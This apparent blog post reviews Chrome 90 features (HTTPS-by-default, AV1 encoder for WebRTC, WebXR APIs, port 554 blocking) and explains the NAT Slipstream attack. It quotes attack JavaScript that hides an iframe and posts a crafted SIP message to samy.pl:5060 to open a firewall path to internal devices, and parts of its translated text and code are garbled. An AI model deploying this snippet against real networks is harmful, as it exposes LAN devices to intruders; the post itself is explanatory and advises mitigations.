The text/cold wild goose
Chrome 90, which was released on April 13, brings some interesting new features.
background
In the past decade or so, Web technology has advanced by leaps and bounds, and Chrome has done more than any other. Being on the big front end can help us understand what’s going on in the industry.
Actually, I’ve been following Chrome for a long time, and I’ve written a few blog posts about Chrome:
-
Lesson 3: What is garbage Collection?
-
Lesson 4: How does V8 work?
-
Lesson 5: How Chrome works
-
Third party cookie will not be allowed to use immediately, Internet advertising how to play?
-
The Great Chrome browser: Chrome 89 Opens the Internet of Things for Web Applications
While writing Chrome 89, I realized that I could write about Chrome in a much more focused, in-depth, and systematic way. In this way, on the one hand, I can improve my professional ability and writing ability, and on the other hand, I can improve my influence. I also hope to publish a book on Chrome within five years, as publishing a book is the ultimate goal of every writer.
Therefore, I will take “the Great Chrome Browser” as the title, each version of Chrome for a detailed interpretation, but also in-depth to introduce Chrome in all aspects of detail, share some of my own some immature thinking, welcome to pay attention to hanyan Talk public account.
TL; TR
-
When was Chrome 90 released? 2021-04-13
-
How many features have been updated for Chrome 90? For details about the features, see Chrome Platform Status
-
Which version of the V8 engine will Chrome 90 use? v9.0
-
What are the biggest highlights of Chrome 90? Using HTTPS by default is a very small change, but it’s important enough that the era of HTTP streaking is finally coming to an end. Unfortunately, this feature is still in grayscale and has not been fully released
-
What, in order, are the new features I’m interested in?
-
A safer default for navigation: HTTPS
-
AV1 Encoder
-
WebXR Depth API and WebXR AR Lighting Estimation
-
Feature: Block HTTP port 554
-
What new features are you interested in, in order? This I do not know ah, welcome to leave a comment!
Detailed interpretation
A safer default for navigation: HTTPS
Type the URL in the browser address bar, then press Enter, and what happens? This is a classic interview question.
Chrome 90 will now use HTTPS to open urls by default, changing the answer to this interview question a bit.
When we type example.com, Chrome prior to 90 will access example.com by default, and the server, if configured with redirection, will redirect to https://example.co… 90 will access example.com by default.
Seeing is believing, so try a simple test. PS: Clear browsing data before testing; otherwise, HTTPS will be used by default when Chrome is accessed the second time.
When I open kiwenlau.com using Chrome 89, I find that the first request is HTTP (kiwenlau.com/) and return status 301, heavy…
When I open kiwenlau.com using Chrome 90, the first request is still HTTP (kiwenlau.com/), not HTTPS…
I thought it was a BUG, so I made an issue:
-
Issue 1200048: Chrome 90 does not use https by defaut
#omnibox-default-typed navigations-to-https: Enabled #omnibox-default-typed navigations-to-https: Enabled #omnibox-default-typed navigations-to-https: Enabled
Strictly speaking, it’s not a big deal that only the first request to kiwenlau.com for the first time uses HTTP. However, remember that HTTP itself is transmitted in plain text (HTTP/2 is not required to be encrypted, but all browsers require HTTP/2 to be encrypted, so that only HTTPS can upgrade HTTP/2), which means that every node in the network can view and tamper with HTTP traffic. This is also the basic principle of page hijacking, which is a little scary to think about, especially for those of you who like to visit weird websites.
For HTTP requests, Contents is in plain text:
For HTTPS requests, the Content is encrypted and appears to be garbled:
Of course, for sites that support HTTPS, eliminating HTTP to HTTPS redirection can also improve access performance, but this problem is secondary, after all, there is only one HTTP request, and many sites are already very slow, do not care about tens of milliseconds…
Chrome has been pushing the HTTPS protocol into the industry, and I’ll write a blog post about that later.
AV1 Encoder
The full name of AV1 is AOMedia Video 1, which is an open source, free Video encoding format for higher coding efficiency. According to data from Netflix and Facebook, AV1 can improve compression efficiency by 20% to 30% compared with VP9. Iqiyi also adopted the AV1 format last year, which can save 20 percent of bandwidth. AV1 is also supported by Argos, Youtube’s latest customized Video Coding Unit (VCU).
Expensive broadband has been a heavy burden for video apps, which is one of the key reasons why some well-known long-form video sites have been unable to make money (content costs are another key reason). According to its latest financial report for 2020, iQiyi posted a net loss of 7 billion yuan in 2020, of which bandwidth expenses amounted to 2.4 billion yuan, accounting for 34.3 percent of the loss. For video applications, AV1, a more efficient video encoding format, helps to reduce broadband costs.
The full name of WebRTC is Web Real-Time Communication, which is used to realize real-time video and voice Communication in Web applications. WebRTC is already a 10-year-old technology, and the outbreak of the pandemic has fueled an explosion in demand for videoconferencing, making WebRTC even more important.
Chrome 90 supports AV1 Encoder, which is used to optimize WebRTC video communication: improve compression efficiency, reduce bandwidth usage; Support 30kbps and lower bit rate video, service users with low bandwidth; Optimized screen sharing efficiency.
It has been more than a year since the outbreak of the epidemic worldwide, which has greatly enhanced users’ demand for video conferencing and live broadcasting. Technological progress like AV1 Encoder can also help people overcome the current difficulties, which is also the greatest significance of technology.
AV1 was developed by AOMedia (Alliance for Open Media) to replace Google’s VP9 and compete with h.263, which requires royalty fees. In fact, AOMedia is not an outsider. Google is a core member of AOMedia, and AV1 was developed by Google. As a programmer, you have to accept that Google is omnidirectional in promoting technological progress, and you can see its presence everywhere. How Google is advancing video encoding technology is a topic for another blog post that I’ll elaborate on (again).
For those of you who are using WebRTC to develop a Web video conferencing application, try AV1 Encoder and share with you how it works.
WebXR Depth API and WebXR AR Lighting Estimation
WebXR Depth API and WebXR AR Lighting Estimation are webXR-related feature updates. The WebXR Depth API can be used to obtain the distance between a user’s device and objects in the real world. WebXR AR Lighting Estimation can be used to capture the Lighting situation of the environment.
Most of you probably haven’t used WebXR, so let’s take a look at what WebXR is…
In fact, WebXR is an API for developing AR (Augmented Reality) and VR (Virtual Reality) applications on the Web. AR and VR end with the letter R, so it is named XR.
At WebXR Experiments, there are some examples of WebXR that give you a taste of what WebXR can do.
Sodar, for example, can be used to measure 2m social distance:
Here’s another example of Picturescape, which hasn’t been released yet. It’s fun to look at, but we haven’t quite figured out what it’s all about. We’ll check it out when it’s official:
From the example of WebXR, the application realized by WebXR is relatively simple at present. After all, the application of VR and AR technology itself is also relatively simple and rough. What I’m most interested in is its application in gaming. When will the gameplay experience in ready Player One be available? Wait and see!
Feature: Block HTTP port 554
Chrome 90 blocks port 554 in an effort to mitigate NAT Slipstream 2.0 attacks. Note that the word is mitigated, not resolved, and Chrome cannot fundamentally prevent NAT Slipstream 2.0 attacks.
Discovered by Samy Kamkar at the end of October, NAT Slipstream is a very clever and dangerous attack, He then worked with Armis researchers Ben Seri and Gregory Vishnipolsky to discover a new version of NAT Slipstream 2.0.
Simply put, the victim simply needs to visit the hacker’s website, which is embedded with the hacker’s JavaScript script, and the hacker can bypass the firewall of the victim’s LAN and access any TCP/UDP service on the victim’s LAN.
Get a feel for what the attack flow looks like with NAT Slipstreaming 2.0-Enterprise Network Bypass.
The victim is located on a LOCAL area network (LAN). Devices connected to the LAN include the victim’s smartphone, printer, webcam, printer, and router. Theoretically, devices on the LAN are protected by a firewall. A hacker, on the other hand, is located on the Internet and, in theory, cannot bypass the firewall to directly access devices on the LAN, such as printers and webcams.
The victim used a smartphone to access the link provided by the hacker, and the attacker managed to bypass the firewall, obtain the access address of the printer and webcam, send a print task to the printer remotely, and access the webcam remotely using the default account password.
If your webcam can be viewed by hackers, it would be scary to change the default password.
Of course, if the printer and webcam have a strict password, the attacker can’t access them either. Therefore, devices in the LAN must also do a good job of security precautions. But that’s not the point. The point is that the attacker bypassed the firewall. How did he do that?
Samy Kamkar’s article is very long and contains a lot of technical details, but the most important one is this JavaScript code:
// our sip message var sipmsg = 'REGISTER sip:samy.pl; Transport =TCP SIP/2.0\r\n' + 'Contact: < SIP :[email protected]:1234; transport=TCP>\r\n\r\n' // load form in an iframe so user doesn't see it var iframe = document.createElement('iframe') iframe.name = 'iframe' iframe.style.display = 'none' // hide the iframe // create form var form = document.createElement('form') form.setAttribute('target', 'iframe') // load into iframe form.setAttribute('method', 'POST') // need the POST area where we can add CRLFs form.setAttribute('action', 'http://samy.pl:5060') // "http" server on SIP port 5060 form.setAttribute('enctype', 'multipart/form-data') // ensure our data doesn't get encoded var textarea = document.createElement('textarea') textarea.setAttribute('name', 'textname') // required textarea.innerHTML = sipmsg form.appendChild(textarea) document.body.appendChild(iframe) Document. The body. The appendChild (form) form. Submit () the code, is actually sent a special custom POST request, and the POST request, due to the large volume will be divided into multiple TCP packets. You can see from the code that the port requested by these TCP packets is 5060, which happens to be the port used by the SIP protocol. A hacker can control TCP packets by customizing the size of POST requests. One TCP packet can be interpreted as a SIP REGISTER packet by the NAT device. The Application Level Gateway (ALG) of the NAT device sees this packet and opens a public network port for the hacker. It is also forwarded to the Intranet TCP service that the hacker needs to access. The code is 192.168.0.109:1234. In this way, the hacker can access the Intranet service 192.168.0.109:1234 through the public port on the NAT. NAT devices foolishly forward requests for hackers.Copy the code
This attack is so creative and technical that I’ll write a blog post about it later (digging another hole). Of course, this type of attack is also very dangerous, Samy Kamkar is a genius, fortunately he is a white hat hacker.
Chrome’s blocking of the port is a temporary fix. It’s true that hackers can’t send requests to the blocked port, but they can still be attacked if the victim doesn’t update the browser. To fundamentally solve this problem, it still needs NAT devices, especially ALG and firewalls.
In the Internet of Things era, more and more devices are connected to the Internet at home. As users, we still need to take protective measures:
-
Update the latest Chrome browser;
-
Strengthening security measures for LAN devices, such as stricter passwords;
-
If no, disable the Application Level Gateway (ALG) function of the NAT device.
-
Avoid accessing unknown urls;
Of course, you can also choose to disconnect from the Internet, haha 🙁
conclusion
In my opinion, the most important update to Chrome 90 is the use of HTTPS by default. It’s a very small change, but it’s important. Unfortunately, this feature is still in the grayscale release process and has not been released. The era of HTTP streakiness is finally coming to an end. From the perspective of the present, it feels like a slash-and-burn era to think that the Web was based on plaintext transport protocol. Of course, it was also a great era, the birth of **Web itself is a change in human civilization, we are all lucky to stand on the shoulders of giants. ** If quantum computers crack RSA in the future, HTTPS will be naked now.
I’ve also covered features related to AV1, WebXR, and NAT Slipstreaming. I’ve focused on the background because these are not useful, valuable, and boring to most developers on their own. However, the background knowledge about these features is still needed to understand, which can help us understand the various knowledge points and application scenarios of the big front end more comprehensively. I will continue to write this kind of blog post after the Great Chrome browser. Hope you enjoy it.
I have listed a lot of reference materials at the back of the article, which is a habit I developed when WRITING papers when I was a graduate student. Whenever I have reference materials, I will list them. In fact, this is mainly to facilitate my own reference in the future, and secondly, to share them with interested readers. Among them, there are some high quality content I put the font bold, might as well focus on.
In the process of writing, I also found 3 interesting topics that can be further developed, the first is about Chrome’s promotion of HTTPS technology, the second is about Google’s contribution to promoting the progress of video coding technology, and the third is NAT Slipstreaming. I will also write blog introduction respectively, welcome to pay attention to.
Welcome to follow the official account of Hanyan Talk, follow the blog series of “Great Chrome browser”, and witness the sea of stars in front of the big front with me!
The resources
-
Chrome 90 Beta: AV1 Encoder for WebRTC, New Origin Trials, and More
-
A safer default for navigation: HTTPS
-
New in Chrome 90: Overflow Clip, Permissions Policy, the Declarative Shadow DOM, and more!
-
Chrome 90 will use HTTPS (port 443) by Default – Let us discuss
-
The Great Chrome browser: Chrome 89 opens the Internet of Things for Web applications
-
Real time communication with WebRTC
-
Get Started with WebRTC
-
Google supercharges YouTube with a custom video chip
-
Netflix Now Streaming AV1 on Android
-
Facebook turns on AV1 technology to speed up video streaming
-
Iqiyi has become the first video website in China to use AV1 format to save more than 20% traffic when playing with the same image quality
-
The new AV1 encoding format, h.265’s biggest rival
-
WebXR Experiments
-
Experiment with AR and VR made for the web
-
NAT Slipstreaming v2.0
-
NAT Slipstreaming v2.0: New Attack Variant Can Expose All Internal Network Devices to The Internet
-
NAT Slipstreaming 2.0 – Enterprise Network Bypass
-
A New Attack Allows Access to any TCP/UDP service on a Machine behind NAT – NAT Slipstreaming
-
Understanding Nat Slipstreaming
-
Chrome will block port 554 to prevent NAT Slipstreaming attacks
-
Chrome blocks multiple TCP ports to prevent NAT Slipstreaming attacks